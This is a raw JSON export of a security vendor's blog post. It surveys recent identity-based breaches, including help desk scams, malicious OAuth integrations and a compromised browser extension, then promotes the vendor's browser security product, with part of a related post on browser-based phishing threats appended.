Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":186,"data":988,"content":990},{"uri":989},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/inbound_federation/description.md",[991],{"nodeType":173,"value":992,"marks":993,"data":995},"inbound federation",[994],{"type":194},{},{"nodeType":173,"value":997,"marks":998,"data":999}," — granting comprehensive access that was used to deploy ransomware. ",[],{},{"nodeType":178,"data":1001,"content":1002},{},[1003],{"nodeType":173,"value":1004,"marks":1005,"data":1008},"Transport for London (2024)",[1006,1007],{"type":370},{"type":194},{},{"nodeType":178,"data":1010,"content":1011},{},[1012],{"nodeType":173,"value":1013,"marks":1014,"data":1015},"Attackers socially engineered the Transport for London help desk to gain privileged access to the IT environment, resulting in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users bank details, and all 30,000 staff members having to reset their online credentials in person.",[],{},{"nodeType":178,"data":1017,"content":1018},{},[1019],{"nodeType":173,"value":1020,"marks":1021,"data":1024},"Marks & Spencer (2025)",[1022,1023],{"type":370},{"type":194},{},{"nodeType":178,"data":1026,"content":1027},{},[1028,1032,1041,1045,1054],{"nodeType":173,"value":1029,"marks":1030,"data":1031},"Attackers compromised a Microsoft Entra account belonging to a privileged user via a ",[],{},{"nodeType":186,"data":1033,"content":1035},{"uri":1034},"https://pushsecurity.com/blog/scattered-spider-defending-against-help-desk-scams/",[1036],{"nodeType":173,"value":1037,"marks":1038,"data":1040},"help desk scam",[1039],{"type":194},{},{"nodeType":173,"value":1042,"marks":1043,"data":1044},", which enabled them to steal sensitive data from cloud environments, as well as pivot to deploy ransomware via the ",[],{},{"nodeType":186,"data":1046,"content":1048},{"uri":1047},"https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks",[1049],{"nodeType":173,"value":1050,"marks":1051,"data":1053},"VMware admin console",[1052],{"type":194},{},{"nodeType":173,"value":1055,"marks":1056,"data":1057},". This enabled ransomware to be deployed at the hypervisor layer, evading host-based protections like EDR. ",[],{},{"nodeType":312,"data":1059,"content":1063},{"target":1060},{"sys":1061},{"id":1062,"type":317,"linkType":318},"7hBdHG74NaA3bQfOMpYA9o",[],{"nodeType":178,"data":1065,"content":1066},{},[1067],{"nodeType":173,"value":1068,"marks":1069,"data":1072},"Jaguar Land Rover (2025)",[1070,1071],{"type":370},{"type":194},{},{"nodeType":178,"data":1074,"content":1075},{},[1076],{"nodeType":173,"value":1077,"marks":1078,"data":1079},"Attackers compromised highly privileged admin accounts via a help desk scam, which they leveraged to access and deploy ransomware to all aspects of Jaguar’s business, from CAD and engineering software, to payments tracking, to customer car delivery, using similar techniques to the Marks & Spencer breach. ",[],{},{"nodeType":312,"data":1081,"content":1085},{"target":1082},{"sys":1083},{"id":1084,"type":317,"linkType":318},"6s1X2fo4K9EeVLBmHm4YXb",[],{"nodeType":231,"data":1087,"content":1088},{},[],{"nodeType":235,"data":1090,"content":1091},{},[1092],{"nodeType":173,"value":1093,"marks":1094,"data":1096},"Malicious OAuth integrations",[1095],{"type":370},{},{"nodeType":178,"data":1098,"content":1099},{},[1100],{"nodeType":173,"value":1101,"marks":1102,"data":1105},"Salesforce & Salesloft (1000+ customers) (2025)",[1103,1104],{"type":370},{"type":194},{},{"nodeType":178,"data":1107,"content":1108},{},[1109],{"nodeType":173,"value":1110,"marks":1111,"data":1112},"A vast campaign against Salesforce customers resulted in the compromise of 1000+ Salesforce tenants (according to the attacker) with more than 1.5 billion records stolen. This campaign can consisted of three phases:",[],{},{"nodeType":250,"data":1114,"content":1115},{},[1116,1131,1146],{"nodeType":254,"data":1117,"content":1118},{},[1119],{"nodeType":178,"data":1120,"content":1121},{},[1122,1127],{"nodeType":173,"value":1123,"marks":1124,"data":1126},"Phase 1:",[1125],{"type":370},{},{"nodeType":173,"value":1128,"marks":1129,"data":1130}," The attacker conducted a large-scale vishing campaign against Salesforce customers, calling up users and socially engineering them into connecting a malicious version of the “Data Loader” app into their tenant. This was in fact an attacker-controlled app that enabled data to be mass-exfiltrated via API. ",[],{},{"nodeType":254,"data":1132,"content":1133},{},[1134],{"nodeType":178,"data":1135,"content":1136},{},[1137,1142],{"nodeType":173,"value":1138,"marks":1139,"data":1141},"Phase 2: ",[1140],{"type":370},{},{"nodeType":173,"value":1143,"marks":1144,"data":1145},"The attacker conducted a supply-chain compromise against customers of Salesloft. Users of Salesloft’s “Drift” integration were impacted by attackers stealing access tokens from Salesloft’s AWS environment. This integration allowed the attacker to steal data from customers that had deployed Drift to connected environments — namely, Salesforce, and Google Workspace. ",[],{},{"nodeType":254,"data":1147,"content":1148},{},[1149],{"nodeType":178,"data":1150,"content":1151},{},[1152,1157,1161,1169],{"nodeType":173,"value":1153,"marks":1154,"data":1156},"Phase 3:",[1155],{"type":370},{},{"nodeType":173,"value":1158,"marks":1159,"data":1160}," The attacker then conducted a separate supply-chain compromise involving Gainsight (allegedly using OAuth tokens stolen in the Salesloft attack) which enabled them to ",[],{},{"nodeType":186,"data":1162,"content":1164},{"uri":1163},"https://www.bleepingcomputer.com/news/security/salesforce-investigates-customer-data-theft-via-gainsight-breach/",[1165],{"nodeType":173,"value":1166,"marks":1167,"data":1168},"breach a further 285 Salesforce instances",[],{},{"nodeType":173,"value":1170,"marks":1171,"data":1172}," using stolen OAuth tokens from Gainsight's integrations. ",[],{},{"nodeType":312,"data":1174,"content":1178},{"target":1175},{"sys":1176},{"id":1177,"type":317,"linkType":318},"3TwjpVKQ42SwQRhvGFbZdn",[],{"nodeType":231,"data":1180,"content":1181},{},[],{"nodeType":235,"data":1183,"content":1184},{},[1185],{"nodeType":173,"value":1186,"marks":1187,"data":1189},"Malicious browser extensions",[1188],{"type":370},{},{"nodeType":178,"data":1191,"content":1192},{},[1193],{"nodeType":173,"value":1194,"marks":1195,"data":1198},"CyberHaven (2024)",[1196,1197],{"type":370},{"type":194},{},{"nodeType":178,"data":1200,"content":1201},{},[1202],{"nodeType":173,"value":1203,"marks":1204,"data":1205},"Hackers phished a CyberHaven extension developer and uploaded a malicious version of the CyberHaven extension to the Chrome Web Store, leading to customer data breaches where installed in user browsers, impacting CyberHaven’s estimated ~400 business customers. This was part of a broader campaign that targeted 35 Chrome extensions, collectively impacting over 2.5 million users.",[],{},{"nodeType":312,"data":1207,"content":1211},{"target":1208},{"sys":1209},{"id":1210,"type":317,"linkType":318},"4ErDI0xi0Vj2Zrk8Qsb2NB",[],{"nodeType":231,"data":1213,"content":1214},{},[],{"nodeType":169,"data":1216,"content":1217},{},[1218],{"nodeType":173,"value":1219,"marks":1220,"data":1222},"The bigger picture",[1221],{"type":370},{},{"nodeType":178,"data":1224,"content":1225},{},[1226],{"nodeType":173,"value":1227,"marks":1228,"data":1229},"Scattered Lapsus$ Hunters are dominating the headlines right now, but they aren’t the only attackers using these modern techniques and consciously evading established security controls. ",[],{},{"nodeType":178,"data":1231,"content":1232},{},[1233],{"nodeType":173,"value":1234,"marks":1235,"data":1236},"Threat reports agree that attackers are steering away from traditional exploit and malware-driven breaches towards identities:",[],{},{"nodeType":250,"data":1238,"content":1239},{},[1240,1263,1285],{"nodeType":254,"data":1241,"content":1242},{},[1243],{"nodeType":178,"data":1244,"content":1245},{},[1246,1250,1259],{"nodeType":173,"value":1247,"marks":1248,"data":1249},"Identity-based attacks surged 32% in the last year, while 97% of identity attacks are password-based, driven by credential leaks and infostealer malware. (",[],{},{"nodeType":186,"data":1251,"content":1253},{"uri":1252},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[1254],{"nodeType":173,"value":1255,"marks":1256,"data":1258},"Microsoft",[1257],{"type":194},{},{"nodeType":173,"value":1260,"marks":1261,"data":1262},")",[],{},{"nodeType":254,"data":1264,"content":1265},{},[1266],{"nodeType":178,"data":1267,"content":1268},{},[1269,1273,1282],{"nodeType":173,"value":1270,"marks":1271,"data":1272},"79% of detections were malware-free in the last year, up from 40% in 2019. (",[],{},{"nodeType":186,"data":1274,"content":1276},{"uri":1275},"https://www.crowdstrike.com/en-gb/global-threat-report/",[1277],{"nodeType":173,"value":1278,"marks":1279,"data":1281},"CrowdStrike",[1280],{"type":194},{},{"nodeType":173,"value":1260,"marks":1283,"data":1284},[],{},{"nodeType":254,"data":1286,"content":1287},{},[1288],{"nodeType":178,"data":1289,"content":1290},{},[1291,1295,1304],{"nodeType":173,"value":1292,"marks":1293,"data":1294},"Credential abuse and phishing combined accounted for 38% of breaches, making identity the primary breach vector observed. (",[],{},{"nodeType":186,"data":1296,"content":1298},{"uri":1297},"https://www.verizon.com/business/resources/reports/dbir/",[1299],{"nodeType":173,"value":1300,"marks":1301,"data":1303},"Verizon",[1302],{"type":194},{},{"nodeType":173,"value":1260,"marks":1305,"data":1306},[],{},{"nodeType":178,"data":1308,"content":1309},{},[1310],{"nodeType":173,"value":1311,"marks":1312,"data":1313},"And other public breaches from this year alone demonstrate similar TTPs from outside of the Scattered Lapsus$ Hunters orbit:",[],{},{"nodeType":250,"data":1315,"content":1316},{},[1317,1332,1347,1362],{"nodeType":254,"data":1318,"content":1319},{},[1320],{"nodeType":178,"data":1321,"content":1322},{},[1323,1328],{"nodeType":173,"value":1324,"marks":1325,"data":1327},"Nikkei",[1326],{"type":370},{},{"nodeType":173,"value":1329,"marks":1330,"data":1331},": Japanese publishing giant Nikkei’s Slack messaging platform was compromised using stolen credentials, leaking the names, email addresses, and chat histories for 17,368 individuals registered on Slack.",[],{},{"nodeType":254,"data":1333,"content":1334},{},[1335],{"nodeType":178,"data":1336,"content":1337},{},[1338,1343],{"nodeType":173,"value":1339,"marks":1340,"data":1342},"Evertec",[1341],{"type":370},{},{"nodeType":173,"value":1344,"marks":1345,"data":1346},": Hackers tried to steal $130 million from Evertec’s Brazilian subsidiary Sinqia S.A.after gaining unauthorized access to its environment on the central bank’s real-time payment system (Pix) using stolen credentials.",[],{},{"nodeType":254,"data":1348,"content":1349},{},[1350],{"nodeType":178,"data":1351,"content":1352},{},[1353,1358],{"nodeType":173,"value":1354,"marks":1355,"data":1357},"Hy-Vee:",[1356],{"type":370},{},{"nodeType":173,"value":1359,"marks":1360,"data":1361}," Was hit with a data breach after hackers logged in with stolen credentials, exposing 53GB of sensitive data.",[],{},{"nodeType":254,"data":1363,"content":1364},{},[1365],{"nodeType":178,"data":1366,"content":1367},{},[1368,1373],{"nodeType":173,"value":1369,"marks":1370,"data":1372},"Scania: ",[1371],{"type":370},{},{"nodeType":173,"value":1374,"marks":1375,"data":1376},"Automotive giant Scania confirmed it suffered a cybersecurity incident where threat actors used compromised credentials to breach its Financial Services systems and steal insurance claim documents.",[],{},{"nodeType":178,"data":1378,"content":1379},{},[1380],{"nodeType":173,"value":1381,"marks":1382,"data":1383},"Scattered Lapsus$ Hunters may be grabbing the headlines — but this a huge movement in a vast and flexible community of attackers. And criminals around the world are learning from their success. ",[],{},{"nodeType":231,"data":1385,"content":1386},{},[],{"nodeType":169,"data":1388,"content":1389},{},[1390],{"nodeType":173,"value":1391,"marks":1392,"data":1394},"Lessons learned",[1393],{"type":370},{},{"nodeType":178,"data":1396,"content":1397},{},[1398],{"nodeType":173,"value":1399,"marks":1400,"data":1401},"The common thread with all of these attacks is that they are evading established security controls by targeting applications directly, over the internet, via account takeover.",[],{},{"nodeType":178,"data":1403,"content":1404},{},[1405],{"nodeType":173,"value":1406,"marks":1407,"data":1408},"Clearly, the success of these attacks shows the limitations of multiple control layers. Endpoint and network layer controls have no visibility of this attack surface. Identity-focused controls are being undermined by ghost logins and shadow IT. And the limitations of cloud security controls in their ability to encompass all apps, and detect and stop malicious actions in real-time (that often blend in seamlessly with normal user activity). ",[],{},{"nodeType":312,"data":1410,"content":1414},{"target":1411},{"sys":1412},{"id":1413,"type":317,"linkType":318},"4Dg3fZEGf7ShyQJ8jlNDME",[],{"nodeType":231,"data":1416,"content":1417},{},[],{"nodeType":169,"data":1419,"content":1420},{},[1421],{"nodeType":173,"value":1422,"marks":1423,"data":1425},"How Push can help",[1424],{"type":370},{},{"nodeType":178,"data":1427,"content":1428},{},[1429],{"nodeType":173,"value":1430,"marks":1431,"data":1432},"Stopping attacks that are designed to evade established controls is in our DNA — it’s the reason Push was founded. ",[],{},{"nodeType":178,"data":1434,"content":1435},{},[1436],{"nodeType":173,"value":1437,"marks":1438,"data":1439},"The browser is the gateway to to the apps and identities that attackers are now targeting, with many attacks taking place inside the user’s browser — whether that’s entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA. ",[],{},{"nodeType":178,"data":1441,"content":1442},{},[1443],{"nodeType":173,"value":1444,"marks":1445,"data":1446},"Push’s browser-based security platform provides comprehensive detection and response capabilities against attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":178,"data":1448,"content":1449},{},[1450,1454,1463,1467,1476],{"nodeType":173,"value":1451,"marks":1452,"data":1453},"To learn more about Push, ",[],{},{"nodeType":186,"data":1455,"content":1457},{"uri":1456},"https://pushsecurity.com/resources/product-brochure",[1458],{"nodeType":173,"value":1459,"marks":1460,"data":1462},"check out our latest product overview",[1461],{"type":194},{},{"nodeType":173,"value":1464,"marks":1465,"data":1466}," or ",[],{},{"nodeType":186,"data":1468,"content":1470},{"uri":1469},"https://pushsecurity.com/demo",[1471],{"nodeType":173,"value":1472,"marks":1473,"data":1475},"book some time with one of our team for a live demo",[1474],{"type":194},{},{"nodeType":173,"value":1477,"marks":1478,"data":1479},".",[],{},"\"Scattered Lapsus$ Hunters\" — how modern attackers exploit the gaps in your security stack ","How Scattered Lapsus$ Hunters breaches demonstrate the evolution of attacker TTPs, shaping the future of cyber attacks.","2025-11-13T00:00:00.000Z","scattered-lapsus-hunters",{"items":1485},[1486,1488],{"sys":1487,"name":505},{"id":504},{"sys":1489,"name":509},{"id":508},{"items":1491},[1492],{"fullName":1493,"jobTitle":1494,"profilePicture":1495},"Dan Green","Threat Research",{"url":1496},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",[1498,5443,6889,12103,15281,18373,19673,22834,26103,28066,29274,30443,31611,34964,38145,40855,42958,46418,49212,51720,53627,55594,57965,60027,62760,65031,66775,68789,70866,72857,75689,78161,80183,82812,84296,86989,89505,91436,94026,96441,98992,100682,103018,105811,107768,109523,112642,113591,114504,117217,118125,121135,123363,125418,127704,129913,132249,134281,137071,139957,142465,145342,148034,148937,152050,154918,158175,161711,164532,167333,168039,170062,173222,176122,179231,182542,184089,186560,188814,190064,192197,194384,198035,200050,202827,206100,209134,211320,213494,216193,218051,219924,221007,226789,229261,231723,232989,234607,236622,238838,240844,245130,245997,247694,249224,252440,253148,254295,257683,260482,262106,262822,264437,265261,265770,266397,269345,272772,273200,274702,277571,280296,282951,284982,285788,286485,288196,290639,293020,294453,296776,298926,300811,301917,306482,310503,313241,315616,317226,318867,320092,321318,322644,323585,324691,325909,328348,330167,331568,332663,333898,335467,335848,336780,337453,338063,339909,340728,341235,342064,342904,343457,344691,345213,345641,346321,347348,348098,350222,350958,352462,352872],{"_path":1499,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":1501,"ogImage":118,"summary":1504,"title":1515,"subtitle":118,"metaTitle":1516,"synopsis":1514,"hashTags":118,"publishedDate":1517,"slug":1518,"tagsCollection":1519,"relatedBlogPostsCollection":1525,"authorsCollection":4786,"content":4790,"_id":5438,"_type":5439,"_source":5440,"_file":5441,"_stem":5442,"_extension":5439},"/blog/browser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches","blog",{"id":1502,"publishedAt":1503},"4Mq5IZ2E0h9HRT3YkkHaLU","2026-04-15T10:01:39.512Z",{"json":1505},{"data":1506,"content":1507,"nodeType":165},{},[1508],{"data":1509,"content":1510,"nodeType":178},{},[1511],{"data":1512,"marks":1513,"value":1514,"nodeType":173},{},[],"Browser sync attacks result in business credentials being compromised via personal account and device breaches. Here's what you need to know. ","Browser sync attacks: Where personal account hacks lead to corporate breaches","Analyzing browser sync attacks and how to stop them","2026-04-15T00:00:00.000Z","browser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches",{"items":1520},[1521,1523],{"sys":1522,"name":509},{"id":508},{"sys":1524,"name":505},{"id":504},{"items":1526},[1527,2912,3977],{"__typename":1528,"sys":1529,"content":1531,"title":2895,"synopsis":2896,"hashTags":118,"publishedDate":2897,"slug":2898,"tagsCollection":2899,"authorsCollection":2905},"BlogPosts",{"id":1530},"wI3paLVDlEKdaRI5qMYFc",{"json":1532},{"nodeType":165,"data":1533,"content":1534},{},[1535,1542,1565,1572,1578,1585,1592,1599,1605,1608,1616,1623,1629,1635,1652,1864,1876,1884,1891,1898,1905,1925,1931,1938,1941,1949,1956,1989,1996,2012,2033,2068,2074,2081,2100,2107,2114,2117,2125,2132,2225,2232,2239,2247,2254,2261,2268,2274,2282,2289,2296,2303,2309,2316,2324,2343,2351,2358,2364,2367,2375,2382,2389,2499,2505,2512,2519,2526,2533,2540,2548,2555,2562,2586,2592,2608,2623,2639,2645,2653,2660,2668,2675,2678,2686,2693,2726,2732,2756,2763,2766,2774,2781,2797,2803,2810,2817,2820,2828,2846,2853],{"nodeType":178,"data":1536,"content":1537},{},[1538],{"nodeType":173,"value":1539,"marks":1540,"data":1541},"Here are two things that can’t both be true:",[],{},{"nodeType":250,"data":1543,"content":1544},{},[1545,1555],{"nodeType":254,"data":1546,"content":1547},{},[1548],{"nodeType":178,"data":1549,"content":1550},{},[1551],{"nodeType":173,"value":1552,"marks":1553,"data":1554},"Users are the weakest link in security. They just need to stop clicking on things.",[],{},{"nodeType":254,"data":1556,"content":1557},{},[1558],{"nodeType":178,"data":1559,"content":1560},{},[1561],{"nodeType":173,"value":1562,"marks":1563,"data":1564},"The internet is a giant clicking-on-things machine.",[],{},{"nodeType":178,"data":1566,"content":1567},{},[1568],{"nodeType":173,"value":1569,"marks":1570,"data":1571},"In particular, when we look at the TTPs of modern browser-based attacks that target employees, it’s obvious where this disconnect has real consequences. ",[],{},{"nodeType":312,"data":1573,"content":1577},{"target":1574},{"sys":1575},{"id":1576,"type":317,"linkType":318},"2x3blnHzZYcJ8c439C4NqI",[],{"nodeType":178,"data":1579,"content":1580},{},[1581],{"nodeType":173,"value":1582,"marks":1583,"data":1584},"Here’s why: Security tooling hasn’t kept up with adversary advances, and normal human behaviors are being expressly targeted via the browser to achieve compromise of accounts and endpoints. If you list the pitfalls facing the common end-user encountering these kinds of attack methods, the picture becomes even more stark.",[],{},{"nodeType":178,"data":1586,"content":1587},{},[1588],{"nodeType":173,"value":1589,"marks":1590,"data":1591},"To solve these problems, you need security tooling that sits in line with the user where they’re already working: In the browser. In this Push product guide, we’ll cover how you can use Push to provide point-in-time guidance — everything from block pages to informational banners — to protect users from modern browser-based TTPs and to guide them to remediate common vulnerabilities that can lead to account takeover.",[],{},{"nodeType":178,"data":1593,"content":1594},{},[1595],{"nodeType":173,"value":1596,"marks":1597,"data":1598},"We’ve also recently introduced custom branding and styling options for user-facing block pages and banners so you can provide a cohesive and trustworthy experience across your security ecosystem.",[],{},{"nodeType":312,"data":1600,"content":1604},{"target":1601},{"sys":1602},{"id":1603,"type":317,"linkType":318},"7fwCnr9bz76rWWCL6EReOT",[],{"nodeType":231,"data":1606,"content":1607},{},[],{"nodeType":169,"data":1609,"content":1610},{},[1611],{"nodeType":173,"value":1612,"marks":1613,"data":1615},"Why you can’t train users to recognize modern browser-based attack methods",[1614],{"type":370},{},{"nodeType":178,"data":1617,"content":1618},{},[1619],{"nodeType":173,"value":1620,"marks":1621,"data":1622},"User awareness training can help you build your workforce’s basic security baseline. But it’s not a reliable remedy for modern browser-based TTPs. When you look at the creative methods attackers are using — and rapidly improving on — it’s obvious why.",[],{},{"nodeType":312,"data":1624,"content":1628},{"target":1625},{"sys":1626},{"id":1627,"type":317,"linkType":318},"eHla7GPCH5eTpdfEqW5Zo",[],{"nodeType":312,"data":1630,"content":1634},{"target":1631},{"sys":1632},{"id":1633,"type":317,"linkType":318},"29vUtbEUam8fhbwnQdINRJ",[],{"nodeType":178,"data":1636,"content":1637},{},[1638,1642,1648],{"nodeType":173,"value":1639,"marks":1640,"data":1641},"To avoid account or endpoint compromise while going about your daily work as a user, you would need to accomplish these ",[],{},{"nodeType":173,"value":1643,"marks":1644,"data":1647},"extremely 100% achievable activities",[1645],{"type":1646},"italic",{},{"nodeType":173,"value":1649,"marks":1650,"data":1651},", including:",[],{},{"nodeType":1653,"data":1654,"content":1655},"table",{},[1656,1683,1726,1749,1784,1818],{"nodeType":1657,"data":1658,"content":1659},"table-row",{},[1660,1672],{"nodeType":1661,"data":1662,"content":1663},"table-header-cell",{},[1664],{"nodeType":178,"data":1665,"content":1666},{},[1667],{"nodeType":173,"value":1668,"marks":1669,"data":1671},"Scenario",[1670],{"type":370},{},{"nodeType":1661,"data":1673,"content":1674},{},[1675],{"nodeType":178,"data":1676,"content":1677},{},[1678],{"nodeType":173,"value":1679,"marks":1680,"data":1682},"Threat",[1681],{"type":370},{},{"nodeType":1657,"data":1684,"content":1685},{},[1686,1712],{"nodeType":1687,"data":1688,"content":1689},"table-cell",{},[1690],{"nodeType":178,"data":1691,"content":1692},{},[1693,1697,1708],{"nodeType":173,"value":1694,"marks":1695,"data":1696},"While using search engines, never click on a ",[],{},{"nodeType":1698,"data":1699,"content":1703},"entry-hyperlink",{"target":1700},{"sys":1701},{"id":1702,"type":317,"linkType":318},"2YmiesBvJHGw4wiKEKzLUq",[1704],{"nodeType":173,"value":1705,"marks":1706,"data":1707},"malicious link",[],{},{"nodeType":173,"value":1709,"marks":1710,"data":1711}," in sponsored or organic results (it's often the first link you see, too).",[],{},{"nodeType":1687,"data":1713,"content":1714},{},[1715],{"nodeType":178,"data":1716,"content":1717},{},[1718,1722],{"nodeType":173,"value":1719,"marks":1720,"data":1721},"M",[],{},{"nodeType":173,"value":1723,"marks":1724,"data":1725},"alvertising, SEO poisoning, compromised legitimate webpages, vibecoded phishing webpages.",[],{},{"nodeType":1657,"data":1727,"content":1728},{},[1729,1739],{"nodeType":1687,"data":1730,"content":1731},{},[1732],{"nodeType":178,"data":1733,"content":1734},{},[1735],{"nodeType":173,"value":1736,"marks":1737,"data":1738},"Know when to trust an email coming from an app you use every day, and when it could be malicious (it looks the same).",[],{},{"nodeType":1687,"data":1740,"content":1741},{},[1742],{"nodeType":178,"data":1743,"content":1744},{},[1745],{"nodeType":173,"value":1746,"marks":1747,"data":1748},"Using SaaS services to distribute malicious links using trusted sites (also a handy way of evading email controls).",[],{},{"nodeType":1657,"data":1750,"content":1751},{},[1752,1774],{"nodeType":1687,"data":1753,"content":1754},{},[1755],{"nodeType":178,"data":1756,"content":1757},{},[1758,1762,1770],{"nodeType":173,"value":1759,"marks":1760,"data":1761},"When reading a LinkedIn DM from a colleague, anticipate that they might have been hacked and have sent you a malicious link. (Yes, this was a ",[],{},{"nodeType":186,"data":1763,"content":1765},{"uri":1764},"https://pushsecurity.com/blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack/",[1766],{"nodeType":173,"value":1767,"marks":1768,"data":1769},"real scenario",[],{},{"nodeType":173,"value":1771,"marks":1772,"data":1773},"). ",[],{},{"nodeType":1687,"data":1775,"content":1776},{},[1777],{"nodeType":178,"data":1778,"content":1779},{},[1780],{"nodeType":173,"value":1781,"marks":1782,"data":1783},"Abuse of social media, IM platforms, and other apps where you can be directly contacted by users external to your organization. ",[],{},{"nodeType":1657,"data":1785,"content":1786},{},[1787,1797],{"nodeType":1687,"data":1788,"content":1789},{},[1790],{"nodeType":178,"data":1791,"content":1792},{},[1793],{"nodeType":173,"value":1794,"marks":1795,"data":1796},"When logging in to an app, never follow benign-seeming but actually malicious instructions to enter a code onto a legitimate page to complete your login.",[],{},{"nodeType":1687,"data":1798,"content":1799},{},[1800],{"nodeType":178,"data":1801,"content":1802},{},[1803,1807,1815],{"nodeType":173,"value":1804,"marks":1805,"data":1806},"AiTM phishing, OAuth consent phishing, ",[],{},{"nodeType":186,"data":1808,"content":1810},{"uri":1809},"https://pushsecurity.com/blog/device-code-phishing/",[1811],{"nodeType":173,"value":1812,"marks":1813,"data":1814},"device code phishing",[],{},{"nodeType":173,"value":1477,"marks":1816,"data":1817},[],{},{"nodeType":1657,"data":1819,"content":1820},{},[1821,1831],{"nodeType":1687,"data":1822,"content":1823},{},[1824],{"nodeType":178,"data":1825,"content":1826},{},[1827],{"nodeType":173,"value":1828,"marks":1829,"data":1830},"Know which instructions to follow and which are malicious when verifying that you're human on a CAPTCHA-style page.",[],{},{"nodeType":1687,"data":1832,"content":1833},{},[1834],{"nodeType":178,"data":1835,"content":1836},{},[1837,1840,1848,1852,1860],{"nodeType":173,"value":37,"marks":1838,"data":1839},[],{},{"nodeType":186,"data":1841,"content":1843},{"uri":1842},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/",[1844],{"nodeType":173,"value":1845,"marks":1846,"data":1847},"ClickFix",[],{},{"nodeType":173,"value":1849,"marks":1850,"data":1851},"-style attacks that trick the user into running a malicious script or command, or ",[],{},{"nodeType":186,"data":1853,"content":1855},{"uri":1854},"https://pushsecurity.com/blog/consentfix/",[1856],{"nodeType":173,"value":1857,"marks":1858,"data":1859},"ConsentFix",[],{},{"nodeType":173,"value":1861,"marks":1862,"data":1863}," (which is even sneakier and simply involves copying a URL).",[],{},{"nodeType":178,"data":1865,"content":1866},{},[1867,1871],{"nodeType":173,"value":1868,"marks":1869,"data":1870},"And we're barely scratching the surface here. ",[],{},{"nodeType":173,"value":1872,"marks":1873,"data":1875},"Easy, right?",[1874],{"type":370},{},{"nodeType":235,"data":1877,"content":1878},{},[1879],{"nodeType":173,"value":1880,"marks":1881,"data":1883},"Can't we block users from interacting with bad content? ",[1882],{"type":370},{},{"nodeType":178,"data":1885,"content":1886},{},[1887],{"nodeType":173,"value":1888,"marks":1889,"data":1890},"So if you can’t train your way out of these problems, what about locking down and blocking your way out of the problem?",[],{},{"nodeType":178,"data":1892,"content":1893},{},[1894],{"nodeType":173,"value":1895,"marks":1896,"data":1897},"This, too, simply isn’t really feasible. ",[],{},{"nodeType":178,"data":1899,"content":1900},{},[1901],{"nodeType":173,"value":1902,"marks":1903,"data":1904},"Modern cloud-first adversaries routinely rotate domains on malicious pages; use trusted services like SharePoint, Adobe, Google Sites, Cloudflare, and Atlassian to deliver lures; target end-users across multiple channels, including social media, forums, chat platforms, Google search results, email, and webpages; and use legitimate security tools like bot protection to bypass detection by other legitimate security tools, such as web content scanning and analysis solutions.",[],{},{"nodeType":178,"data":1906,"content":1907},{},[1908,1912,1916,1921],{"nodeType":173,"value":1909,"marks":1910,"data":1911},"To safely navigate the internet today, y",[],{},{"nodeType":173,"value":1913,"marks":1914,"data":1915},"ou need to be able to spot malicious pages and content ",[],{},{"nodeType":173,"value":1917,"marks":1918,"data":1920},"the first time they're seen in the wild",[1919],{"type":370},{},{"nodeType":173,"value":1922,"marks":1923,"data":1924},". If you're relying on indicators of known bad, you're always a step behind, leaving users exposed.",[],{},{"nodeType":312,"data":1926,"content":1930},{"target":1927},{"sys":1928},{"id":1929,"type":317,"linkType":318},"3ZfqOLRdJZJIc78rj9E9JZ",[],{"nodeType":178,"data":1932,"content":1933},{},[1934],{"nodeType":173,"value":1935,"marks":1936,"data":1937},"To protect users while they work online, you need a purpose-built security tool that can respond in real time to modern TTPs and guide users securely — without introducing extra work or a lot of friction. Push can help with that.",[],{},{"nodeType":231,"data":1939,"content":1940},{},[],{"nodeType":169,"data":1942,"content":1943},{},[1944],{"nodeType":173,"value":1945,"marks":1946,"data":1948},"Why in-browser controls?",[1947],{"type":370},{},{"nodeType":178,"data":1950,"content":1951},{},[1952],{"nodeType":173,"value":1953,"marks":1954,"data":1955},"Simply put, using in-browser security controls gets you the closest to the user and their work in order to protect them from modern browser-based threats. Adding in-browser controls also solves two tricky problems for security teams: ",[],{},{"nodeType":250,"data":1957,"content":1958},{},[1959,1974],{"nodeType":254,"data":1960,"content":1961},{},[1962],{"nodeType":178,"data":1963,"content":1964},{},[1965,1970],{"nodeType":173,"value":1966,"marks":1967,"data":1969},"Filling the gap between solution layers",[1968],{"type":370},{},{"nodeType":173,"value":1971,"marks":1972,"data":1973}," in order to detect and block attack methods like Adversary-in-the-Middle phishing, malicious browser extensions, and ClickFix-style social engineering attacks that other tools miss.",[],{},{"nodeType":254,"data":1975,"content":1976},{},[1977],{"nodeType":178,"data":1978,"content":1979},{},[1980,1985],{"nodeType":173,"value":1981,"marks":1982,"data":1984},"Providing just-in-time security enforcement",[1983],{"type":370},{},{"nodeType":173,"value":1986,"marks":1987,"data":1988}," to end-users when it’s the right moment to act on that guidance, reducing your attack surface across your online apps, browser extensions, and accounts, and ensuring your app usage policies are followed.",[],{},{"nodeType":235,"data":1990,"content":1991},{},[1992],{"nodeType":173,"value":1993,"marks":1994,"data":1995},"Fill the gap between solution layers",[],{},{"nodeType":178,"data":1997,"content":1998},{},[1999,2003,2008],{"nodeType":173,"value":2000,"marks":2001,"data":2002},"Most existing security solutions operate just ",[],{},{"nodeType":173,"value":2004,"marks":2005,"data":2007},"outside",[2006],{"type":1646},{},{"nodeType":173,"value":2009,"marks":2010,"data":2011}," the context of a user interacting with a webpage. This leaves blind spots that attackers are exploiting between layers of security 